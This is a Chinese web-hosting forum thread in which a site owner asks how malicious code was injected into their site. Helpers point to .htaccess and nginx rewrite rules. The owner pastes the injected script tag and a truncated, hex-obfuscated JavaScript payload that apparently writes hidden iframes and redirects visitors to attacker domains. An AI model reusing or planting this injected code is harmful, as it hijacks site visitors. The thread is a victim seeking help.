全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
楼主: dahai0405

[Windows VPS] 万能的HOSTLOC 谁能告诉我这种马是怎么挂上的?

[复制链接]
发表于 2018-8-17 10:39:23 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2018-8-17 12:28:01 来自手机 | 显示全部楼层
楼上说得对
 楼主| 发表于 2018-8-17 13:54:30 | 显示全部楼层
bob1987 发表于 2018-8-17 10:39
看一下你的伪静态里面是不是被人改了,就是黑进你的主机?vps?服务器?然后修改你的伪静态,.htacesee那 ...

根目录没有 .htacesee 伪静态
发表于 2018-8-17 14:11:11 来自手机 | 显示全部楼层
nginx 伪静态 查下
 楼主| 发表于 2018-8-17 14:24:28 | 显示全部楼层
宝塔的伪静态路径在哪啊?  /www/server/ngxin/?
 楼主| 发表于 2018-8-17 14:46:11 | 显示全部楼层
有没有大神能指点一下
 楼主| 发表于 2018-8-17 14:53:06 | 显示全部楼层
页面内容是这样子的


<script src="https://s5.cnzz.biz/porxy.php?id=33222&web_id=33222&show=pic" language="JavaScript"></script>


我已经举报了 这个DNS  解析 暂停解析了


内容是这样的 var _0xade='t252.xyz';
var _0xa7fe=["\x61\x2E\x31\x6B\x28\x22\x22\x29\x3B\x61\x2E\x31\x6D\x28\x27\x3C\x75\x20\x31\x73\x3D\x22\x31\x6F\x3A\x31\x70\x22\x3E\x3C\x66\x20\x31\x72\x3D\x22\x4F\x22\x20\x4B\x3D\x22\x72\x3A\x5C\x2F\x5C\x2F\x31\x78\x2E\x31\x38\x2E\x4E\x5C\x2F\x31\x30\x2E\x31\x33\x3F\x31\x71\x3D\x31\x35\x26\x31\x34\x3D\x31\x32\x22\x20\x31\x31\x3D\x22\x31\x36\x22\x3E\x3C\x5C\x2F\x66\x3E\x3C\x5C\x2F\x75\x3E\x27\x29\x3B\x36\x20\x62\x3D\x27\x72\x3A\x2F\x2F\x31\x37\x2E\x27\x2B\x31\x61\x2B\x27\x3A\x31\x39\x2F\x77\x2E\x31\x62\x27\x3B\x36\x20\x37\x3D\x59\x2E\x56\x2E\x58\x28\x29\x3B\x36\x20\x44\x3D\x37\x2E\x39\x28\x2F\x46\x2F\x69\x29\x3D\x3D\x22\x46\x22\x3B\x36\x20\x76\x3D\x37\x2E\x39\x28\x2F\x43\x20\x42\x2F\x69\x29\x3D\x3D\x22\x43\x20\x42\x22\x3B\x36\x20\x74\x3D\x37\x2E\x39\x28\x2F\x47\x2F\x69\x29\x3D\x3D\x22\x47\x22\x3B\x36\x20\x6D\x3D\x37\x2E\x39\x28\x2F\x41\x3A\x31\x2E\x32\x2E\x33\x2E\x34\x2F\x69\x29\x3D\x3D\x22\x41\x3A\x31\x2E\x32\x2E\x33\x2E\x34\x22\x3B\x36\x20\x6C\x3D\x37\x2E\x39\x28\x2F\x7A\x2F\x69\x29\x3D\x3D\x22\x7A\x22\x3B\x36\x20\x48\x3D\x37\x2E\x39\x28\x2F\x79\x2F\x69\x29\x3D\x3D\x22\x79\x22\x3B\x36\x20\x6B\x3D\x37\x2E\x39\x28\x2F\x67\x20\x78\x2F\x69\x29\x3D\x3D\x22\x67\x20\x78\x22\x3B\x36\x20\x70\x3D\x37\x2E\x39\x28\x2F\x67\x20\x45\x2F\x69\x29\x3D\x3D\x22\x67\x20\x45\x22\x3B\x6A\x28\x44\x7C\x7C\x76\x7C\x7C\x74\x7C\x7C\x6D\x7C\x7C\x6C\x7C\x7C\x48\x7C\x7C\x6B\x7C\x7C\x70\x29\x7B\x35\x2E\x38\x2E\x68\x3D\x62\x7D\x36\x20\x71\x3D\x27\x4C\x3A\x27\x3D\x3D\x61\x2E\x38\x2E\x31\x67\x3F\x31\x66\x3A\x31\x65\x3B\x6A\x28\x71\x29\x7B\x35\x2E\x38\x2E\x68\x3D\x62\x7D\x6A\x28\x73\x2E\x35\x2E\x64\x29\x7B\x73\x2E\x35\x2E\x64\x2E\x38\x3D\x62\x7D\x21\x55\x28\x29\x7B\x22\x31\x69\x20\x31\x6C\x22\x3B\x36\x20\x6F\x3D\x61\x2E\x31\x6A\x28\x22\x66\x22\x29\x2C\x6E\x3D\x61\x2E\x57\x28\x22\x66



重点还是 这木马到底在哪 藏的好深啊!
 楼主| 发表于 2018-8-17 17:05:27 | 显示全部楼层
难道没有大神指点一下吗?
发表于 2018-8-17 17:15:09 | 显示全部楼层
开局一个网址,细节全靠猜
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-3-11 13:12 , Processed in 0.060623 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表